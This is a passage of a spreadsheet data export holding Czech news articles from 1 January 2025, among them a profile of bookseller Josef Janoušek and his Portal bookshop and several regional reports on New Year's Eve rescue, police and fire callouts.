    <t>Shrnutí SLOVÁCKÝ GEN - Josef Janoušek | iDobryDen Foto: Miroslav Potyka / Josef Janoušek s hercem Vlastimilem Brodským a starostou Ladislavem Šupkou . Uherské Hradiště Společnost 01 / 01 / 2025 Psal se podzim roku 2005 a já přišla za Josefem Janouškem s nabídkou, že bych o něm ráda napsala Slovácký gen. Mávl rukou, pokynul mi, ať se posadím, a se slovy: „Až příště!“ mi nalil pohárek červeného. Ale příště už nebylo. Ke konci roku pan Janoušek onemocněl a 13. února 2006 zemřel. Křižovatka životních cest Říkal o sobě, že je křižovatka. A měl pravdu. V Domě knihy Portal, který budoval téměř patnáct let, zkřížily své cesty desítky osobností. Josef Janoušek nerozlišoval profese, národnosti, nehleděl na věk ani postavení. Propojoval výtvarníky, herce, chovatele rybiček, spisovatele, dýmkaře, bonsaisty, holubáře, architekty, právníky, politiky, novináře, pejskaře, muzikanty i cestovatele. Přitahoval lidi a dokázal je spojit. „Byl ve svém živlu, když byl mezi lidmi,“ vzpomíná jeho žena Dana. Kdyby návštěvy neodešly a zůstaly až do rána, byl by nejspokojenější. „Vytvořil obchod, který měl ducha. Josef dovedl sehnat knihy, dovedl je nabídnout, uměl vřele přijmout nejen své zákazníky, ale všechny, kdo přišli třeba jenom na kus řeči, to všechno ho nesmírně bavilo a naplňovalo,“ vzpomíná jeho někdy přítel, někdy protivník Jiří Jilík . Ze svého Domu knihy vytvořil kulturní centrum, jaké široko daleko nemá obdoby. Šlechtic z Těmic Narodil se v Těmicích na Kyjovsku. Otec byl zedník a později po válce se živil jako rolník. „Pepík měl s tamním sedláckým životem málo společného. Byl to ryze městský člověk,“ tvrdí jeho životní družka. Jednou z mála venkovských věcí, pro něž měl odmala vášeň, byli holubi. V Těmicích měl svůj první holubník. (V Hradišti měl pak své holuby na faře. Často tam chodil relaxovat.) A miloval koně. Chtěl se stát žokejem. Vystudovat zemědělskou školu, ale když otce v padesátých letech vyloučili ze strany, Josef namísto studií skončil v hutích. O pár let později vzal místo šoféra v Dopravním podniku Zlín a později práci saniťáka, při níž se setkal s dalším slavným saniťákem, nyní folkovým písničkářem Wabi Daňkem . Ve chvílích volna si přivydělával v autoškole jako instruktor. A volantu se nepustil ani ve Filmovém studiu Gottwaldov . Pracoval a žil „Práce pro něj vždycky byla na prvním místě. Všemu vlastně říkal, že pracuje, ale ve skutečnosti žil,“ říká Richard Janoušek, jeho syn a nástupce. „Žil tím, co dělal, o čem přemýšlel. A přitom nikdy nebyl spokojený, než dokončil jednu práci, jeden projekt, měl už v hlavě čtyři pět dalších …“ dodává Dana. „Stále byl přesvědčený, že to ještě není úplně ono.“ Měl obrovský dar nápaditosti, prostorového vnímání, dar věci správně otipovat. Jeho svět byla jeho pracovna, veliký stůl, možnost nabídnout víno , kdykoliv, komukoliv, co hrdlo ráčilo. „Když se to rozjelo, tak to jelo, jelo, až do dna, až do konce,“ vzpomíná Jilík . Byl to bohém. „Měl rád společnost, rád se bavil s lidmi, aby se dozvěděl něco nového. A ve svých zálibách se nenechal nikým omezovat,“ vypráví Richard. „Na druhou stranu ale dokázal žít poměrně skromně, i když navenek působil marnotratně. “ Josef Janoušek uměl být velkorysý. K lidem i k majetku. Neměl rád úzkoprsost. Nepočítal každou korunu. „Máme tady otevřenou výroční sadu dvou dýmek, z nichž jedna je zakouřená. Celá sada stála asi sto tisíc a teď je neprodejná,“ vypráví Richard. Janoušek ji zakouřil na své šedesátiny. „Sice se pak chvíli chytal za hlavu, ale bral to sportovně. Uměl si dopřát,“ vzpomíná Richard. Moje sestra - žena Často, když se u něho zdržela společnost do pozdních nočních hodin, zazvonil telefon. „To bude moje sestra žena,“ povídá, „řekne: Pepíku, už nepij.“ A taky že jo. „Byl to živel,“ usmívá se Dana. Poznali se před osmadvaceti lety, kdy Josef jezdil sanitkou a ona pracovala v lékárně. „Byl nesmírně zábavný, spontánní, nikdy s ním nebyla nuda,“ vysvětluje, čím si ji získal. Byla mu věrnou partnerkou až do posledních dnů. Podporovala jej v jeho snech, nerozmlouvala mu je, věděla, že to nemá žádný smysl. „Nikdo nemá představu, čím si prošel, když budoval Portal, co všechno musel překousnout,“ vypráví. Vzpomíná na dobu, kdy Portal byl jen malá místnůstka. Kdo zná dnešní podobu Domu knihy Portal, těžko si dokáže představit, že celé knihkupectví začínalo v prostoru, kam se dnes nevejdou ani mapy. Vzpomíná, jak se neustále bouralo, překopávalo, rozšiřovalo. „Pepík dlouho přespával v malém kumbálku, kde je dnes trafika, na zemi na molitanu. A naproti přes chodbu měl malou kancelář, kde choval v jeden čas i čtyři psy. Z toho dva dobrmany. Bylo to absurdní, ale on byl taková buldočí povaha. V něčem velmi praktický, v jiném ohledu zcela ovládaný svými zájmy, představami a budovatelskými sny.“ Portal (od kumbálku k Domu knihy) Když se v měšťanském domě č. 35 uvolnily prostory, podali s Jiřím Jilíkem žádost a městská rada jim je pronajala. Tak vznikla prodejna nakladatelství Moraviapress. Janoušek tu měl sedět a prodávat, zatímco Jilík toho času ještě působil v redakci nakladatelství. „Když jsem za čtrnáct dnů přijel, Josef stál v chodbě se sbíječkou v ruce, kangem tam boural stěny a budoval,“ vzpomíná Jilík , jak se celý vyděsil. „Bylo to pro něj typické. Jakmile měl představu, tak za ní šel. Byla to ve své podstatě sympatická vlastnost. Já byl ale vždycky opatrnější.“ Tehdy se Jilík rozhodl, že projekt opustí a nechá Josefa uskutečňovat své sny. Ať si k původnímu kutlochu sbíječkou připojuje další a další prostory, jak se mu je postupně podařilo získávat. A s odstupem času sám uznal, že být to obráceně, nikdy by Portal nebyl, čím je. Velmi brzo totiž pochopil, že spolupráce s Josefem by stejně neměla dlouhé trvání. On nebyl týmový hráč, o všem musel rozhodovat sám, a především měl velmi jasnou představu, které se nechtěl, ani nemohl vzdát. Za svým snem šel tvrdohlavě, třeba i hlavou proti zdi. „ Josef byl nesmírně schopný ve vyjednávání a v prosazování svého názoru. Kousek po kousku vytvořil jedinečné knihkupectví, které svým objemem a sortimentem nabízených knih nemá v Čechách a na Moravě obdoby. Kdyby Josef byl tehdy tím, kdo opustil společný projekt, a já bych budoval, asi bych dodnes seděl v tom malém kutlochu a nadával, že se neprodávají knížky.“ A Josef Janoušek začal měnil Portal k obrazu svému. Stále dál Mnohé projekty musel časem opustit (IC v Buchlovicích ), mnohdy pociťoval nepřízeň osudu (povodně v roce 1997), nepřízeň institucí, nebo spíš lidí. Ale to hlavní, centrum kultury v Uherském Hradišti , se mu vybudovat podařilo. Založením Nadace pro umění Idy , Vladislava a Betty Vaculkových otevřel cestu a „přivezl“ do Hradiště mnohé výtvarníky ( Věra Janoušková , Čestmír Kafka , Jaroslav Šerých, Jindřich Štreit, Vladimír Franz , …). Do Portalu se rádi vraceli také spisovatelé ( Ludvík Vaculík , Alexandra Berková , Jiří Stránský , Antonín Přidal, …), herci ( Vlastimil Brodský , Miroslav Horníček , Lubor Tokoš , …), politici ( Pavel Tigrid , Václav Klaus , Jiří Lobkowitz ,...), cestovatelé, muzikanti, a v neposlední řadě také bonsaisté. Třeba korejský profesor Kim Se-won. V roce 1996 vyhrál Josef Janoušek výběrové řízení a založil první městské informační centrum. Věnoval se také vydavatelské činnosti. První počin v této oblasti vynesl cenu Nejkrásnější česká kniha roku 1995. Byla to kniha o životě a díle sochaře Vladimíra Janouška Proč to dělám. Mimo knihkupecké aktivity se pouštěl do projektů, které měly esteticky zkultivovat prostředí, ve kterém žil a do kterého přiváděl své přátele. Zaneřáděný dvorek za domem, kde nejprve vybudoval pavilon, který nepřežil povodně, proměnil na japonskou zahradu. Té dominuje keramická plastika Idy Vaculkové. Zahradu postupně doplňoval a rozšiřoval o jedinečnou sbírku bonsají. Zde je třeba zmínit důležitou maličkost, že všechny tyto projekty financoval sám, ač byl jenom nájemníkem města. Pipe club Portal Janouškův Portal si přitom nezamilovali jen „knihomolové“. K prvním stavebním úpravám, které Josef Janoušek vlastnoručně realizoval, patřilo vyklizení sklepa pod schodištěm. Tady časem vybudoval specializovanou trafiku, jaká nemá konkurenci široko daleko. „Začínal s dýmkami a postupně sortiment rozšířil o doutníky. A protože nerad kouřil sám, začal si zvát lidi. Docházel jsem k němu já, Svatopluk Bimka, Ivo Frolec, … A jednou takhle říká: Uděláme tu Pipe club!“ vzpomíná Ladislav Šupka . „Setkávání u Janouška bylo jiné, chutnali jsme nové tabáky, poznávali nové lidi...“ Josef Janoušek vnímal dýmku jako symbol úspěšnosti a rád se úspěšnými a chytrými lidmi obklopoval. I na tuto vášeň se nyní snaží navázat syn Richard. „Kouření mi vždycky spíš vadilo. Až teď k němu získávám vztah, z jakési piety a také proto, abych tento rituál více pochopil, udělal si přehled a získal zkušenost. Abych nenabízel něco, o čem sám nic nevím. A tak zatímco mí kamarádi s kouřením přestávají, já začínám,“ směje se Richard. Milovník umění Přestože byl Josef Janoušek původně šoférem, předčil mnohé vzdělance. Jeho přítel Svatopluk Slovenčík ho zasvětil do tajů výtvarného umění a přivedl ho k zálibě, které se věnoval až do posledních dní svého života. Josef se velmi rychle zorientoval ve světě českého výtvarného umění a vytvořil cennou sbírku. Jednou vezl režiséra Zemana a vzadu spočívalo dílo od Václava Boštíka . „Co to tam vezeš za sračky?“ otázal se velký filmař a proboden pohledem uslyšel: „Za tohle se, pane režisére, rozbíjí dršťka.“ Rozuměl výtvarnému umění, s většinou autorů, jejichž obrazy měl ve své sbírce, se osobně přátelil. Josef Janoušek se nebál otevřenosti a přímosti. Než aby podlehl většině, raději u ostatních získával podporu názorů vlastních. A to se mu často dařilo. „Ze začátku jsme se přeli,“ vzpomíná Gabriel Slanicay na počátky přátelství s Josefem Janouškem. „Kdysi jsem od něj koupil sbírku dřevorytů Josefa Váchala a při té příležitosti jsme spolu začali komunikovat. Měl velmi dobrý výtvarný vkus, snad že se dlouhý čas pohyboval v oblasti kumštu. Obdivoval jsem jeho kolekci kreseb Jiřího Johna, kresby na papíře Adrieny Šimotové , práce Čestmíra Kafky , pastely a lité kresby Jitky Válové … Vždycky jsem se ptal, jestli je to či ono k mání, ale on se jen pousmál, jak to uměl jen on, jako by říkal: Na to nemáš!“ Z Josefa Janouška prýštila hluboká znalost. Často toho či onoho nazýval břídilem nebo pornografistou, ne však jen z rozmařilosti, aniž by dotyčného znal. „Jeho pohled byl pronikavý, a v konečném důsledku správný,“ míní Slanicay. „Josef Janoušek pro mě byl jakýmsi zjevením. V té době jsem tíhl spíše k měkčímu umění a on mi pomohl najít správný směr. Vždycky mi říkal: To není dobré, jdi touhle cestou. A já se s ním dohadoval, než jsem pochopil, že má pravdu.“ Vyzývavý bojovník „ Josef byl poněkud kontroverzní. Rád vedl spory. Rád diskutoval a rád se přel,“ vzpomíná Jiří Jilík . „Na jednu stranu byl k lidem velmi vstřícný a na druhou stranu se s nimi dovedl rozhádat kvůli naprosté blbosti. Byl to takový vyzývavý bojovník. Když se pro něco nadchl, šel přes mrtvoly.“ Jako by věčné spory naplňovaly jeho pocit, že je aktivní, že má protivníky. „On vlastně v životě neměl ani tak partnery jako spíš soupeře,“ míní Jilík . „Nejvíc jsem s ním válčil v době puberty,“ vzpomíná syn Richard. Rodiče se rozvedli, když mu byli čtyři, a celých osm let se s otcem neměl možnost stýkat. Poznávat a oťukávat se začali, až když Richard nastoupil na hradišťskou SUPŠ, odešel od matky a přestěhoval se k otci. Spojovala je láska k umění a podobný vkus. „Líbily se nám stejné věci, i když jsme je vnímali každý maličko jinak. Měl rád expresivnější, plastičtější malby a já hledal spíše kompozici,“ vysvětluje Richard. Janoušek junior, následovník Pokračovat v díle otce pro něj nebylo vůbec jednoduché. Vzpomíná, jak se tomu celý život bránil. Chtěl dělat design, ten vystudoval a ten ho bavil. Když se ale ukázala závažnost otcovy choroby, bez váhání jej zastoupil. A když pak došlo na lámání chleba, nemusel se rozmýšlet dlouho. „Asi bych se sám před sebou cítil špatně, kdybych to neudělal,“ říká. Opustil svou profesi a stal se knihkupcem. Učí se, vstřebává nové poznatky a přemýšlí nad úpravami k obrazu svému. Jsou ale spíše technického rázu. Nadále organizuje výstavy, provozuje trafiku a učí se kouřit dýmku, naplňovat poselství Nadace I + V + B Vaculkových, a především zachovat Portal jako knihkupectví s co nejširší nabídkou. Dávný sen otce pak hodlá uskutečnit v červnu, kdy se chystá na nádvoří Domu knihy Portal otevření literární kavárny. Tím zůstane zachován duch Domu knihy Portal - místa setkávání, hledání a nalézání. Josef Janoušek se narodil 1. května 1944 v Těmicích . Měl syna Richarda, se ženou Danou pak žil až do posledních dnů. Dům knihy Portal založil roku 1992 v původním měšťanském domě na Masarykově náměstí. Z miniprodejny Moraviapressu vybudoval rozsáhlé členité knihkupectví s nabídkou beletrie, regionální literatury, dětské literatury, literatury pro hobby, literatury počítačové, právní, učebnic i kuchařek. Současně provozoval antikvariát, specializovanou trafiku, galerii se stálou expozicí Jana Sema, pořádal knižní křty, autogramiády, autorská čtení ( Alexandra Berková , Michal Viewegh , Ludvík Vaculík ,...), výstavy ( Čestmír Kafka , Věra Janoušková , Jaroslav Šerých, Vladimír Franz ,...). Roku 1994 založil Nadaci Vaculkových s posláním oživovat jejich odkaz, soustředit jejich dílo a pomáhat mladým začínajícím umělcům. Cestu do Portalu k přátelské návštěvě si našla řada velkých osobností ( Miroslav Horníček , Jaroslav Hutka , Vlastimil Brodský , Pavel Tigrid , Jaroslav Uhlíř , …). autor: Adéla Kotková Autor: Adéla Kotková Autor person Adéla Kotková</t>
  </si>
  <si>
    <t>1690</t>
  </si>
  <si>
    <t>20250101_295_3694636040_9e726e66e543fe07ebb3.html</t>
  </si>
  <si>
    <t>9e726e66e543fe07ebb3</t>
  </si>
  <si>
    <t>Silvestrovská noc v MSK z pohledu záchranářů</t>
  </si>
  <si>
    <t>Silvestrovská noc v MSK z pohledu záchranářů V posledních čtyřiadvaceti hodinách vyjížděly posádky ZZS MSK (od rána 31.12.2024 do šesté ranní 1.1.2025) celkem ve více než čtyř stech případech. Jen od silvestrovské půlnoci do dnešního rána přitom záchranáři ošetřovali 111 pacientů. Nárůst zásahů v těchto hodinách byl více než dvojnásobný oproti běžným nocím. Během novoročních oslav zasahovali záchranáři ZZS MSK u osmi událostí vzniklých při odpalování zábavní pyrotechniky. Jednalo se vesměs o lehká nebo středně těžká poranění hlavy nebo končetiny. Od půlnoci do ranních hodin 1. ledna bylo nutno ošetřovat přes pět desítek zraněných. Mezi úrazy dominovaly pády se zraněními hlavy či končetin a řezná poranění od skla. Polovina zraněných během silvestrovské noci byla pod zjevným vlivem alkoholu , což je obdobný počet, jako v uplynulých letech. Další zhruba tři desítky ošetřovaných osob posádkám ZZS uvedly, že byly napadeny a zraněny jinou osobou, nebo utrpěly poranění při potyčkách. Také většina z nich jevila známky ovlivnění psychotropní látkou. Mezi mechanismy napadení patřily údery lahvemi, tyčemi a dalšími předměty. S diagnózou opilosti či těžké opilosti muselo být v našem kraji záchrannou službou během silvestrovského večera a noci ošetřeno šestnáct osob. foto: ZZS MSK Zdroj : Zdravotnická záchranná služba MSK Související Autor: Jiří Cysař Autor person Jiří Cysař</t>
  </si>
  <si>
    <t>1000</t>
  </si>
  <si>
    <t>20250101_296_3695260736_c706edc802bb3632979b.html</t>
  </si>
  <si>
    <t>c706edc802bb3632979b</t>
  </si>
  <si>
    <t>Hasiči na jižní Moravě likvidovali požáry dvou rodinných domů na Vyškovsku</t>
  </si>
  <si>
    <t>Hasiči na jižní Moravě likvidovali požáry dvou rodinných domů na Vyškovsku Hasiči na jižní Moravě likvidovali požáry tří rodinných domů na Vyškovsku 1. ledna 2025 8:44 , aktualizováno 9:29 Sdílet článek ilustrační snímek | foto: Metro.cz U požáru dvou rodinných domů na Vyškovsku, v Heršpicích a Studnicích, a jednoho ve Svatobořicích-Mistříně na Hodonínsku zasahovali v noci na dnešek jihomoravští hasiči. Ve Studnicích převzali dva lidi do péče záchranáři. Třemi zraněními skončila také nehoda dvě hodiny po půlnoci v Novolíšeňské ulici v Brně , kde se srazila dvě osobní auta, vyplývá z tiskové zprávy hasičů. Letošního silvestra hodnotí hasiči s ohledem na počet výjezdů jako rekordní. Další nehoda se zraněním se stala v Brně na Radlase , student na jednokolce nedal přednost autobusu, uvedli na webu krajští policisté. Hasiči vyjížděli o silvestrovské noci mezi 20:00 a 04:00 k 56 událostem, z toho ve 41 případech k požárům. S výjimkou zmíněných rodinných domů, kde se škody pohybovaly ve statisících korun, a požáru tújí u rodinného domu ve Slavkově u Brna , šlo o odpadní koše a kontejnery. V jednom případě také hořelo dříví v kotelně kláštera dominikánek ve Střelicích na Brněnsku, který slouží jako domov pro zdravotně postižené. Z objektu se muselo evakuovat 55 lidí, ale po ukončení zásahu se mohli vrátit a nikdo se nezranil. Škoda činila 250.000 korun. Policisté také o silvestrovské noci zadrželi ženu z Břeclavska, která je podezřelá z loupeže. "Napadla svého známého a odcizila mu peněženku," uvedl mluvčí Pavel Šváb. Napadený skončil zraněný v nemocnici. Na policejní služebně skončil i mladý muž, který krátce po půlnoci ohrožoval na Moravském náměstí v Brně kolemjdoucí nožem. "Z výtržnictví a ublížení na zdraví se budou zodpovídat také dva muži, kteří v Dubňanech napadli při oslavách několik osob," doplnil Šváb. Záchranáři zažili standardní silvestrovskou noc, řekla ČTK mluvčí Michaela Bothová. Do půlnoci byl relativní klid, od půlnoci do 07:00 měli zhruba 80 výjezdů. Ošetřovali podnapilé osoby, někteří z nich skončili kvůli opilosti v péči záchranářů s úrazem. Buď se zranili sami, nebo se s někým poprali. "Roli mohlo sehrát i náledí," řekla Bothová. Zhruba deset lidí potřebovalo ošetření kvůli tomu, že je na ruce či v obličeji zranila zábavní pyrotechnika. "A mezi 05:00 a 06:00 se také podařilo naší posádce pomoct porodit ještě v sanitce holčičku," doplnila Bothová. Z pohledu brněnských strážníků se jednalo o jednu z nejpoklidnějších silvestrovských nocí za poslední roky z hlediska počtu oznámení i vážnosti případů. Většinou asistovali u rozmíšek způsobených alkoholem , oznámení o zatoulaných psech se nevymykala průměru, uvedl na webu strážníků Jakub Ghanem. Autor: ČTK Sdílet článek Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>20250101_297_3694705873_c75d32b7dd8de1002792.html</t>
  </si>
  <si>
    <t>c75d32b7dd8de1002792</t>
  </si>
  <si>
    <t>Jaké byly oslavy nového roku v Libereckém kraji z pohledu složek IZS?</t>
  </si>
  <si>
    <t>Jaké byly oslavy nového roku v Libereckém kraji z pohledu složek IZS? Je první den roku 2025. Kvůli bujarým oslavám byli celou noc v pohotovosti záchranáři, hasiči i policisté. Jaký byl průběh silvestrovských oslav z jejich pohledu? Velmi náročnou směnu zaznamenala zdravotnická záchranná služba Libereckého kraje . Podle mluvčího Michaela Georgieva to byla jedna z nejnáročnějších nočních vůbec. Za celý poslední den lundského roku bylo v kraji téměř dvě stě výjezdů, od půlnoci do rána už jich bylo také okolo sedmdesáti. Výjezdy záchranářů Při oslavách se v kraji sedm lidí zranilo pyrotechnikou, naštěstí ne vážně. Záchranáři dále řešili mnoho úrazů pod vlivem alkoholu , k těm zdravotníci statistiky zatím nemají. V desítkách případů se lidé nějakým způsobem zranili pod vlivem alkoholu , další desítky případů byly samotné intoxikace alkoholem . Podle Georgieva byl také vysoký počet zranění v důsledku napadení mezi oslavujícími lidmi. I tady byl zjevným akcelerátorem té agrese alkohol . Výjezdy policistů Od 18. hodiny do rána policie přijala sto třináct hovorů. Z velké části šlo o zmíněná napadání. Policejní mluvčí Ivana Baláková upřesnila, že šlo jak o napadání mezi cizími lidmi na ulicích, tak o konflikty v domácnostech. Z velké části šlo o přestupky. V jednom případě policisté věc kvalifikovali jako přečin výtržnictví. Policisté také chytili tři lidi pod vlivem alkoholu za volantem. Dále vyjížděli k muži, který si chtěl sáhnout na život. Podařilo se jim ho ale nakonec zachránit a předali ho do péče lékařů. Policie také od noci pátrala po sedmapadesátileté ženě z Harrachova , která se nevrátila domů. Ráno jí policisté našli podchlazenou u Mumlavských vodopádů a předali do péče zdravotníků. Výjezdy hasičů Z pohledu hasičů byla silvestrovská noc relativně poklidná. První požár likvidovali zhruba půl hodiny před půlnocí, do rána jich pak bylo celkem jedenáct v celém Libereckém kraji. I když to zní jako malé číslo, vzhledem k tomu, kolik pyrotechniky se napříč krajem vystřílelo, je to zhruba o čtvrtinu víc než při oslavách před rokem. I letos se jednalo hlavně o požáry zbytků pyrotechniky a kontejnerů na odpad. Kromě shořelých kontejnerů nevznikly větší škody. Autor: Jiří Jelínek, Aleš Mastník Autoři Jiří Jelínek person Aleš Mastník Rubrika transition_slide Zprávy pro Liberecký kraj</t>
  </si>
  <si>
    <t>20250101_298_3694593617_7fa8073d1cb890edb702.html</t>
  </si>
  <si>
    <t>7fa8073d1cb890edb702</t>
  </si>
  <si>
    <t>Psychiatr Liama ​​Payna ho měsíc před smrtí přestal léčit</t>
  </si>
  <si>
    <t>Psychiatr Liama ​ ​Payna ho měsíc před smrtí přestal léčit Liam Payne Liam Payne , bývalý člen světově známé skupiny One Direction , zemřel 19. října 2024 v argentinském Buenos Aires . Jeho smrt byla tragickým vyústěním dlouholetého boje se závislostmi. Nové důkazy, které se objevily v soudním řízení, odhalují, že byl varován svým psychiatrem o nutnosti intenzivnější léčby jen několik týdnů před svou smrtí. Dopis psychiatra: Výzva k intenzivnější léčbě V září 2024 Liamův psychiatr ukončil spolupráci se zpěvákem s odůvodněním, že potřebuje specializovanou péči. „Po pečlivém zvážení jsem dospěla k názoru, že Liam potřebuje cílenější přístup k léčbě,“ napsala ve svém dopise. Uvedla také doporučení, která zahrnovala pravidelné užívání předepsaných léků, vyhýbání se alkoholu a návykovým látkám, týdenní terapeutická sezení a návštěvy u praktického lékaře. Psychiatr také doporučila, aby se Liam zaměřil na řešení hlubokých depresí a traumat, které byly podle ní klíčové pro zlepšení jeho duševního zdraví. Poskytla mu seznam kontaktů na odborníky a rehabilitační centra, která by mu mohla pomoci. Dopis zakončila slovy plnými naděje: „Přeji vám vše nejlepší na cestě ke zdraví a šťastnému životu.“ článek pokračuje na další stránce.. Autor: - || jdavid || | || | | jdavid | -</t>
  </si>
  <si>
    <t>25360</t>
  </si>
  <si>
    <t>20250101_299_3695127539_d27db65c19a832201043.html</t>
  </si>
  <si>
    <t>d27db65c19a832201043</t>
  </si>
  <si>
    <t>Silvestr v Plzeňském kraji pohledem záchranářů</t>
  </si>
  <si>
    <t>Silvestr v Plzeňském kraji pohledem záchranářů Silvestrovskou noc mají za sebou také záchranné složky. Pro záchranáře v Plzeňském kraji byla klidnější než v minulosti. "Letošní silvestrovské oslavy proběhly pro naše záchranáře klidněji než v předchozích letech. Výjezdy, které byly spojené s vítáním nového roku, nebyly tak závažné a jejich počet čítal kolem dvaceti," uvedla tisková mluvčí záchranné služby Andrea Divišová. Záchranáři v regionu řešili naštěstí jen lehké úrazy. "Úrazy způsobené pyrotechnikou jsme zaznamenaly pouze dva a to lehčího charakteru. Další události, typu úrazy v opilosti či napadení, se pohybovaly v jednotkách a za asistence Policie ČR," doplnila mluvčí. Také policisté prožili klidnou silvestrovskou noc. „Silvestr proběhl v Plzeňském kraji bez mimořádných událostí. Během noci jsme přijali množství oznámení, která se týkala zejména případů osob pod vlivem alkoholu ,“ doplnila mluvčí policie Michaela Raindlová. ilustrační foto Autor: MH || QAP.cz - Vaše internetové noviny</t>
  </si>
  <si>
    <t>2740</t>
  </si>
  <si>
    <t>20250101_3_3698493808_13d391a9326d10e2d5f8.html</t>
  </si>
  <si>
    <t>13d391a9326d10e2d5f8</t>
  </si>
  <si>
    <t>Fofo profil</t>
  </si>
  <si>
    <t>Fofo profil Zobrazit rozložení bodů 'stobodovky' 10. 10. 2024 „ Víno krásné, zlatavé barvy. Ve vůni medovost, květnatost, lehka pepřovost. V chuti svěží krásně kulaté, vyvážené, pepřovost v dochuti“ Zobrazit rozložení bodů 'stobodovky' 1. 11. 2024 „Barva pinotova. Ve vůni zralé třešně, vanilka, s vůní lehce po peckach s náznakem botrytidy. Chuť příjemná svěží, lehká kouřovost, dřevitost.“ Zobrazit rozložení bodů 'stobodovky' 11. 12. 2024 Výborné víno : Špičkově provedené odrůdové víno . Čisté s delší dochutí. Často nejlepší v poměru kvality a ceny. Staňte se fanouškem MojeLahve.cz na Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20250101_30_3698727421_19e74a9e2642ead899b3.html</t>
  </si>
  <si>
    <t>19e74a9e2642ead899b3</t>
  </si>
  <si>
    <t>Spotřební daně</t>
  </si>
  <si>
    <t>Spotřební daně Moderátor Michal Kubal : U cigaret se ode dneška zvedla spotřební daň o pět procent, tedy zhruba o pět korun za krabičku. U zahřívaného tabáku odvod poskočil dokonce o patnáct procent. A zvýšení dopadlo i na elektronické cigarety. Moderátor Barbora Kroužková : S novým rokem znovu rostly i odvody z lihu, opět o 10 procent. Cenu lahve tvrdého pití to může zvednout i o desítky korun. Změna se týká také piva . Jediným alkoholem s nulovou daní zůstává tiché víno .</t>
  </si>
  <si>
    <t>658140</t>
  </si>
  <si>
    <t>20250101_300_3694574302_ed5fa3b8e24f9e7afaf1.html</t>
  </si>
  <si>
    <t>ed5fa3b8e24f9e7afaf1</t>
  </si>
  <si>
    <t>TOP zprávy ze Žďárska za rok 2024. Tragická úmrtí, nehody, velký úlovek i rys</t>
  </si>
  <si>
    <t>TOP zprávy ze Žďárska za rok 2024. Tragická úmrtí, nehody, velký úlovek i rys Mezi nimi byly tragické případy, jako smrt ženy po pokousání psem z místního útulku, nebo zmizení muže pod hladinou Velkého Dářka . Velkou pozornost vzbudila také nehoda ve Žďáru nad Sázavou , při které motorkář zemřel po střetu s autem. Naopak pozitivním momentem bylo ulovení obří štiky nebo houbařské úlovky velkých rozměrů. Podívejte se na přehled TOP zpráv ze Žďárska za rok 2024: Zemřela žena pokousaná psem ve žďárském útulku Tragický konec má případ, v němž pes ve Žďáru nad Sázavou pokousal ženu. Její vnučka nyní Deníku sdělila, že napadená žena i přes pomoc lékařů zemřela. Krimi Fenomén smažák K českým hospodám a restauracím patří stejně neodmyslitelně jako pivo . Přesto i smažák podražil a už běžně stojí v hostincích přes sto padesát korun. Jenže stále ve Žďáře nad Sázavou existují místa, kde toto oblíbené jídlo stojí i méně než stovku. Čtenáři se dozvěděli, kde jej lacině pořídit. play_fill Žďársko Rys se procházel u Nového Veselí Žďársko navštívil rys. Pochází pravděpodobně z Polska . Šelmu natočil muž u silnice v Novém Veselí na Žďársku. Nebála se ho. Žďársko Smrtelná nehoda Tragická nehoda zastavila provoz na železniční trati mezi Žďárem nad Sázavou a Havlíčkovým Brodem v úterý 21. května ráno. Nehody Motorkář zemřel po střetu s autem K tragické dopravní nehodě, při níž zemřel motorkář, došlo koncem července ve Žďáru nad Sázavou . Na místě zasahovaly všechny složky integrovaného záchranného systému. Nehody Nesmířil se s exekucí Okresní soud ve Žďáře nad Sázavou řešil neobvyklý případ muže z Ostrova nad Oslavou na Žďársku. Nedokázal se smířit s faktem, že v exekuci přišel o rodinný dům. Během pár měsíců z domu udělal doslova neobyvatelnou ruinu. Krimi Pod hladinou Velkého Dářka zmizel muž Po muži, který zmizel pod hladinou Velkého Dářka na Žďársku, pátrali policisté i hasiči. Zmizelý na rybníku plul po paddleboardu, ze kterého spadl. play_fill Žďársko Rybář ulovil obří štiku Neobyčejný úlovek se podařil rybáři Petru Kačírkovi v srpnu. Po setmění vytáhl z vody přes metr dlouhou štiku obecnou. Lov impozantní ryby se proměnil v adrenalinový zážitek, který trval deset minut. Žďársko Škrdlovický traktorista odešel do nebe traktoristická komunita na Žďársku truchlila na podzim nad ztrátou Martina Havelky , vášnivého milovníka historických traktorů ze Škrdlovic . Jeho rodina oznámila smutnou zprávu na sociálních sítích. Žďársko Nevídaně velké houby Na Žďársku v roce 2024 rostly houby vskutku nemalých rozměrů. Místní houbaři se chlubili úlovky, které dosahovaly nevídané velikosti. Žďársko Mladá žena byla ubodána, muž se udusil Podle informací Deníku žena zemřela na následkem mnohočetných bodnutí nožem. Muž měl zemřít na udušení. Jedním z motivů činu mohly být podle dostupných informací drogy a psychické problémy muže. Krimi Trojice úmrtí mužů V předvánočním čase prověřovali žďárští kriminalisté tři případy úmrtí mužů, ke kterým došlo na Žďársku. Krimi Autor: Beata Dudová Autor person Beata Dudová</t>
  </si>
  <si>
    <t>4760</t>
  </si>
  <si>
    <t>20250101_301_3694574087_d7e8ab6367f9060b3238.html</t>
  </si>
  <si>
    <t>d7e8ab6367f9060b3238</t>
  </si>
  <si>
    <t>Požáry, úrazy od pyrotechniky i ztracení psi, takový byl Silvestr na západě Čech</t>
  </si>
  <si>
    <t>Požáry, úrazy od pyrotechniky i ztracení psi, takový byl Silvestr na západě Čech Plzeňané bouřlivě přivítali rok 2025! K vidění byly po městě desítky různorodých ohňostrojů. Jedno ale měli společné. Burácivou kanonádu, která polekala několik psů. Podle portálu Psí detektiv se jen v Plzni ztratili během odpoledne tři chlupáči. Hasiči měli ke středečnímu ránu na kontě necelou dvacítku výjezdů k požárům a většinou šlo o hořící popelnice. Také záchranáři měli překvapivě klidnou směnu a třeba úrazy od pyrotechniky řešili jen dva. „Letošní silvestrovské oslavy proběhly pro naše záchranáře klidněji než v předchozích letech. Výjezdy, které byly spojené s vítáním nového roku, nebyly tak závažné a jejich počet čítal kolem dvaceti. Úrazy způsobené pyrotechnikou jsme zaznamenaly pouze dva, a to lehčího charakteru. Další události, typu úrazy v opilosti či napadení, se pohybovaly v jednotkách a za asistence Policie ČR, “ shrnula mluvčí krajských záchranářů Andrea Divišová . „Silvestr proběhl v Plzeňském kraji bez mimořádných událostí. Během noci jsme přijali množství oznámení, která se týkala zejména případů osob pod vlivem alkoholu ,“ doplnila stručně policejní mluvčí Michaela Raindlová . Hasiči mají na kontě ke středeční sedmé hodině 